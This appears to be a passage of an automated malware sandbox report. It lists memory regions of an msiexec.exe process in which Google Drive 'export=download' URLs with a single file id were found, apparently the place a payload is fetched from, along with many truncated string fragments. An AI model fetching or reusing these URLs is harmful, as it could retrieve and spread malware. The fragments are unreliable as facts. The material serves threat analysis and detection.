00000008.00000003.2455058177.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download8ZAQ
    Source: msiexec.exe, 00000008.00000002.2585091489.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=downloadcn
    Source: msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2340671273.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2479027485.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2408835178.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466820778.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2444511172.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2318203930.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2491715042.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2421732807.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2385950640.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2329580852.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2432767321.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2455058177.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=downloade
    Source: msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2562006346.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2340671273.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2479027485.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2408835178.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466820778.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2444511172.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2318203930.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2491715042.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2585091489.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2421732807.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2526749849.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2575236744.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2549615290.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2538548894.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=downloadrZ
    Source: msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2408835178.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466820778.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2444511172.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2421732807.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2432767321.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2455058177.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=downloadt
    Source: msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/;
    Source: msiexec.exe, 00000008.00000003.2329580852.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466820778.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2515750713.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2562006346.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2421732807.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123795079.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2503831860.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2549615290.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2408835178.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135941062.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2575236744.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007FC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172727495.0000000007FC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/C
    Source: msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/W
    Source: msiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2340671273.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2408835178.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2444511172.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2318203930.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2421732807.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2385950640.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2329580852.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/c
    Source: msiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2110507536.0000000007FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/devine.cn
    Source: msiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172678889.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147098085.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161927602.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2098833921.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2110507536.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2087985140.0000000007FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ertificates
    Source: msiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172678889.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161927602.0000000007FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ervices-cn.com
    Source: msiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147098085.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2110507536.0000000007FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/et
    Source: msiexec.exe, 00000008.00000003.2562006346.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2479027485.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466820778.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2444511172.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2491715042.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2585091489.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2526749849.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2575236744.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2549615290.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2538548894.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2503831860.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2455058177.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/g
    Source: msiexec.exe, 00000008.00000003.2110507536.0000000007FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/l
    Source: msiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172678889.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147098085.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161927602.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2098833921.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2110507536.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2087985140.0000000007FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/nalytics-cn.com
    Source: msiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/r
    Source: msiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172678889.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147098085.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161927602.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/rS
    Source: msiexec.exe, 00000008.00000002.2585091489.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2526749849.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2575236744.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2549615290.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2538548894.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2329580852.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/rcontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=do
    Source: msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2408835178.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/s
    Source: msiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2340671273.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172678889.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147098085.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161927602.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2318203930.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/te.google.com
    Source: msiexec.exe, 00000008.00000003.2098833921.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2110507536.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2087985140.0000000007FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/u
    Source: msiexec.exe, 00000008.00000003.2455058177.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2597127265.0000000023090000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP
    Source: msiexec.exe, 00000008.00000002.2585019335.0000000007F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP3
    Source: msiexec.exe, 00000008.00000002.2585019335.0000000007F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP7
    Source: msiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172678889.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161927602.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP;K
    Source: msiexec.exe, 00000008.00000003.2575236744.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2549615290.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2538548894.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2503831860.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avPCIktL_zQq9z-avP
    Source: msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avPCIktL_zQq9z-avP7
    Source: msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avPCIktL_zQq9z-avPZ#G
    Source: msiexec.exe, 00000008.00000003.2562006346.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2585091489.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2526749849.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2575236744.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2549615290.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2538548894.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avPCIktL_zQq9z-avPZ#w
    Source: msiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avPCK
    Source: msiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147098085.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2098833921.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2110507536.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2087985140.0000000007FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avPG
    Source: msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2098833921.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2110507536.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2087985140.0000000007FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avPGJ
